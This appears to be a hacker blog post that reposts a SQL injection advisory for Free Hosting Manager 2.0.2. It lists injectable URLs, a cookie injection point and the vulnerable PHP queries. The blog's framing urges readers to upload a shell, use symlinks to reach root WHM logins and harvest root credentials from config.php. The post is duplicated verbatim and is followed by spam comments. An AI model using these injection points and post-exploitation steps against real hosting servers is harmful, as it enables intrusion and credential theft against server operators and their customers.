Hi , for today Free hosting manager.Free hosting manager is a free script to install and run your hosting.
Its includes clients register their and then order hosting and blah blah..so the script is highly vulnerable plus if you successfully upload the shell or have server access you do symlink to get the root whm logins.
Free hosting manager store root logins in config.php
So if you shell it you should check config.php for root logins.
Exploit Links
http://www.exploit-db.com/exploits/24879
http://packetstormsecurity.com/files/120920/Free-Hosting-Manager-2.0.2-SQL-Injection.html
http://1337day.com/exploit/20555
Exploit Details
-------------------------------------------------------------------------
# Software : Free Hosting Manager V2.0.2 Multiple SQLi
# Author : Saadat Ullah , saadi_linux@rocketmail.com
# Author home : http://security-geeks.blogspot.com
# Date : 23/3/13
# Vendors : http://www.fhm-script.com
# Download Link : http://www.fhm-script.com/download.php
-------------------------------------------------------------------------
+---+[ Multiple SQL injection]+---+
Its is vulnerable to SQLi on many file some of them are..
http://localhost/Free/clients/reset.php?code=[SQLi]
http://localhost/Free/clients/tickets.php?id=[SQLi]
http://localhost/free/clients/viewaccount.php?id=[SQLi]
Cookie based injeciton In
http://localhost/free/clients/home.php
inject the cookie value clientuser
http://localhost/free/clients/register.php ---> SQLi on all POST Fields.
Proof Of Concept
In home.php
Calling a function auth() and what it is
if ((isset($_COOKIE['clientuser'])) && isset($_COOKIE['clientpass']) && isset($_COOKIE['clientid'])) {
$clientuser = $_COOKIE['clientuser'];
$clientpass = $_COOKIE['clientpass'];
$clientid = $_COOKIE['clientid'];
$this->clientuser = $_COOKIE['clientuser'];
$this->clientpass = $_COOKIE['clientpass'];
$this->clientid = $_COOKIE['clientid'];
return true;
$dbquery = @mysql_query("SELECT * FROM clients WHERE id='$clientid' AND username='$clientuser' AND password='$clientpass'") or die(mysql_error());
In Reset.php
http://localhost/Free/clients/reset.php?code=[SQLi]
elseif ((isset($code)) || ($_GET['do'] == "code")) {
$details = mysql_query("SELECT * FROM clientpwactivation WHERE activationcode='$code'")
or die(mysql_error());
In tickets.php
http://localhost/Free/clients/tickets.php?id=[SQLi]
if ((isset($_GET['id'])) && ($_GET['action'] == "close") && ($_GET['confirm'] == "true")) {
$fhm->closeticket($_GET['id']);
.
.
$checkticket = mysql_query("SELECT * FROM tickets WHERE id='$ticket' AND clientid='$this->clientid'") or die(mysql_error());
In Viewaccount.php
http://localhost/free/clients/viewaccount.php?id=[SQLi]
$id = $_GET['id'];
.
$getacct = mysql_query("SELECT * FROM orders WHERE id='$id' AND clientid='$fhm->clientid'") or die(mysql_error());
In register.php
$firstname = stripslashes($_POST['first_name']);
$lastname = stripslashes($_POST['last_name']);
$company = stripslashes($_POST['company']);
$address = stripslashes($_POST['address']);
$address2 = stripslashes($_POST['address_2']);
$country = stripslashes($_POST['country']);
$city = stripslashes($_POST['city']);
$state = stripslashes($_POST['state_region']);
$postcode = stripslashes($_POST['postal_code']);
$telnumber = stripslashes($_POST['tel_number']);
$faxnumber = stripslashes($_POST['fax_number']);
$emailaddress = stripslashes($_POST['email_address']);
$username = stripslashes($_POST['username']);
$password1 = stripslashes($_POST['password']);
$password2 = stripslashes($_POST['confirm_password']);
.
.
.
.
.
.
$insertuser = mysql_query("INSERT INTO clients VALUES('', '$username', '$md5pass', '$firstname', '$lastname', '$company', '$address', '$address2', '$city', '$country', '$state', '$postcode', '$telnumber', '$faxnumber', '$emailaddress', '$startingcredits', '1', '', '', '$timestamp') ")
Only using stripslahes which will not protect against doing sql injection attack.
#independent Pakistani Security Researcher
Its includes clients register their and then order hosting and blah blah..so the script is highly vulnerable plus if you successfully upload the shell or have server access you do symlink to get the root whm logins.
Free hosting manager store root logins in config.php
So if you shell it you should check config.php for root logins.
Exploit Links
http://www.exploit-db.com/exploits/24879
http://packetstormsecurity.com/files/120920/Free-Hosting-Manager-2.0.2-SQL-Injection.html
http://1337day.com/exploit/20555
Exploit Details
-------------------------------------------------------------------------
# Software : Free Hosting Manager V2.0.2 Multiple SQLi
# Author : Saadat Ullah , saadi_linux@rocketmail.com
# Author home : http://security-geeks.blogspot.com
# Date : 23/3/13
# Vendors : http://www.fhm-script.com
# Download Link : http://www.fhm-script.com/download.php
-------------------------------------------------------------------------
+---+[ Multiple SQL injection]+---+
Its is vulnerable to SQLi on many file some of them are..
http://localhost/Free/clients/reset.php?code=[SQLi]
http://localhost/Free/clients/tickets.php?id=[SQLi]
http://localhost/free/clients/viewaccount.php?id=[SQLi]
Cookie based injeciton In
http://localhost/free/clients/home.php
inject the cookie value clientuser
http://localhost/free/clients/register.php ---> SQLi on all POST Fields.
Proof Of Concept
In home.php
Calling a function auth() and what it is
if ((isset($_COOKIE['clientuser'])) && isset($_COOKIE['clientpass']) && isset($_COOKIE['clientid'])) {
$clientuser = $_COOKIE['clientuser'];
$clientpass = $_COOKIE['clientpass'];
$clientid = $_COOKIE['clientid'];
$this->clientuser = $_COOKIE['clientuser'];
$this->clientpass = $_COOKIE['clientpass'];
$this->clientid = $_COOKIE['clientid'];
return true;
$dbquery = @mysql_query("SELECT * FROM clients WHERE id='$clientid' AND username='$clientuser' AND password='$clientpass'") or die(mysql_error());
In Reset.php
http://localhost/Free/clients/reset.php?code=[SQLi]
elseif ((isset($code)) || ($_GET['do'] == "code")) {
$details = mysql_query("SELECT * FROM clientpwactivation WHERE activationcode='$code'")
or die(mysql_error());
In tickets.php
http://localhost/Free/clients/tickets.php?id=[SQLi]
if ((isset($_GET['id'])) && ($_GET['action'] == "close") && ($_GET['confirm'] == "true")) {
$fhm->closeticket($_GET['id']);
.
.
$checkticket = mysql_query("SELECT * FROM tickets WHERE id='$ticket' AND clientid='$this->clientid'") or die(mysql_error());
In Viewaccount.php
http://localhost/free/clients/viewaccount.php?id=[SQLi]
$id = $_GET['id'];
.
$getacct = mysql_query("SELECT * FROM orders WHERE id='$id' AND clientid='$fhm->clientid'") or die(mysql_error());
In register.php
$firstname = stripslashes($_POST['first_name']);
$lastname = stripslashes($_POST['last_name']);
$company = stripslashes($_POST['company']);
$address = stripslashes($_POST['address']);
$address2 = stripslashes($_POST['address_2']);
$country = stripslashes($_POST['country']);
$city = stripslashes($_POST['city']);
$state = stripslashes($_POST['state_region']);
$postcode = stripslashes($_POST['postal_code']);
$telnumber = stripslashes($_POST['tel_number']);
$faxnumber = stripslashes($_POST['fax_number']);
$emailaddress = stripslashes($_POST['email_address']);
$username = stripslashes($_POST['username']);
$password1 = stripslashes($_POST['password']);
$password2 = stripslashes($_POST['confirm_password']);
.
.
.
.
.
.
$insertuser = mysql_query("INSERT INTO clients VALUES('', '$username', '$md5pass', '$firstname', '$lastname', '$company', '$address', '$address2', '$city', '$country', '$state', '$postcode', '$telnumber', '$faxnumber', '$emailaddress', '$startingcredits', '1', '', '', '$timestamp') ")
Only using stripslahes which will not protect against doing sql injection attack.
#independent Pakistani Security Researcher
2 comments:
Many interesting information
Escorts London
Interesting things you describe here. phone girls London
Post a Comment